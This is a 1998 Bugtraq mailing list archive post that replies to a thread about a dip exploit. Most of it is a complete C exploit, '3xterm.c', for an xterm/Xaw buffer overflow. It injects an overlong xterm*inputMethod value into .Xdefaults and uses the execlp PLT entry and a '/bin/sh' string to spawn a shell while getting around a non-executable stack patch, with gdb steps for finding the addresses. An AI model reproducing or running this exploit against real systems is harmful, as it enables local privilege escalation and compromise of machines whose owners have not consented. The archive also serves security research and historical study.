Bugtraq mailing list archives
Re: dip-3.3.7p exploit (stackpatch_
From: woloszyn () NOSPAM IT PL (M.C.Mar)
Date: Sun, 28 Jun 1998 14:04:19 +0200
On Fri, 26 Jun 1998, Thomas Troeger wrote:
Hi, While playing around with dip-3.3.7p I realized that the method I used in my previous posting won't do. So I had a look at the source and developed a new program. Here it goes:
(...) So.. I also developed some time ago xploit that works around nonexecutable stackpatch (Linux), but for xterm and Xaw vulnerability. It seemt that defeating Sorar's stackpatch is easyier than we thought if program contains any exec* PLT entry. It it contains exec*p we may use any string to execute ./_anystring_ if we have . in PATH variable. So here goes my 'sploit: $ cat 3xterm.c /* A simple xploit working around non-executable stack patch! ;) Based on Solar Designer's: "Getting around non-executable stack(fix)" post and: Rafa³ Wojtczuk's "Defeating Solar Designer'a Non-executable Stack Patch" sploit by Kil3r of Lam3rZ against both Xaw and neXtaw widgets based on xterm_exp.c by alcuin Compile it like this: gcc 3xterm.c -L /usr/X11/lib/ -lXaw -lXmu -lXt -lSM -lICE -lXext -lX11 -lc Description: The sploit simply puts the EXECLP address and its parameters addresses onto the stack. To work fine you need to look for execlp Program Linkage Table entry in xterm and for "/bin/sh" string in its text segment... emsi:~mcmar/hack# gdb xterm GDB is free software and you are welcome to distribute copies of it under certain conditions; type "show copying" to see the conditions. There is absolutely no warranty for GDB; type "show warranty" for details. GDB 4.16 (i486-slackware-linux), Copyright 1996 Free Software Foundation, Inc...(no debugging symbols found)... (gdb) print execlp $1 = {<text variable, no debug info>} 0x804bc78 <execlp> (gdb) x/s 0x8063d2e 0x8063d2e <_fini+8158>: "/bin/sh" 0x804bc78 and 0x8063d2e are OK for me, but you may need to look for the riht ones in your case... ;) GreetZ: bulba, smierc, all of Lam3rZ teem and other Polish HackerZ ;) */ #include <stdlib.h> #include <stdio.h> #include <ctype.h> #define CONFFILE ".Xdefaults" #define OLDFILE ".Xdefaults.old" #define NEWFILE ".Xdefaults.new" #define EXECLP 0x804bc78 // execlp PLT adress in xterm #define BIN_SH 0x8063d2e // "/bin/sh" string address in xterm ;) int *ptr; void main(int argc, char *argv[]) { char *home; FILE *f_in, *f_out; char buff[16384]; char shellbuf[16384]; char *s; int i; if (home = getenv("HOME")) chdir(home); if (!(f_out = fopen(NEWFILE, "w"))) { perror("fopen"); exit(1); } if (f_in = fopen(CONFFILE, "r")) { fseek(f_in,0,SEEK_SET); while (!feof(f_in)) { fgets(buff,16384,f_in); for (s=buff;isblank(*s);s++); if (strncmp(s,"xterm*inputMethod",17)<0) fputs(buff,f_out); } fclose(f_in); } /* fill the buffer with nops */ memset(shellbuf, 0x90, sizeof(shellbuf)); shellbuf[sizeof(shellbuf)-1] = 0; ptr = (int *)(shellbuf+1028); *ptr++ =EXECLP; *ptr++ =EXECLP; *ptr++ =BIN_SH; *ptr++ =BIN_SH; *ptr++ = 0; fputs("xterm*inputMethod:",f_out); fputs(shellbuf, f_out); fclose(f_out); system("/bin/cp "CONFFILE" "OLDFILE); system("/bin/mv -f "NEWFILE" "CONFFILE); execl("/usr/X11R6/bin/xterm","xterm",NULL); } It contains some useless stuff, but it's 'coz I just use normal xterm soloit as a base. RegardZ, -- ___________________________________________________________________________ M.C.Mar An NT server can be run by an idiot, and usually is. emsi () it pl "If you can't make it good, make it LOOK good." - Bill Gates Moze to nie miejsce, ale tak np. programy M$ to swoiste pomniki glupoty.
Current thread:
- Re: Bug is sudo?, (continued)
- Re: Bug is sudo? Todd C. Miller (Jun 27)
- Re: security hole in mailx Alvaro Martinez Echevarria (Jun 25)
- Re: security hole in mailx Ben Collins (Jun 25)
- Re: security hole in mailx Theo de Raadt (Jun 25)
- guestbook script is still vulnerable under apache Stunt Pope (Jun 25)
- Re: guestbook script is still vulnerable under apache Theo Van Dinter (Jun 25)
- Re: guestbook script is still vulnerable under apache Andru Luvisi (Jun 25)
- Re: guestbook script is still vulnerable under apache Lincoln Stein (Jun 26)
- dip-3.3.7p exploit (stackpatch_ Thomas Troeger (Jun 26)
- And another qpopper overflow (does this make 3?) Aaron D. Gifford (Jun 28)
- Re: dip-3.3.7p exploit (stackpatch_ M.C.Mar (Jun 28)
- WIPO Bill Aleph One (Jun 25)
- Re: guestbook script is still vulnerable under apache Dean Gaudet (Jun 25)
- Re: guestbook script is still vulnerable under apache Lars Eilebrecht (Jun 25)
- Re: guestbook script is still vulnerable under apache Andrew Clegg (Jun 26)
- Re: security hole in mailx Seth McGann (Jun 25)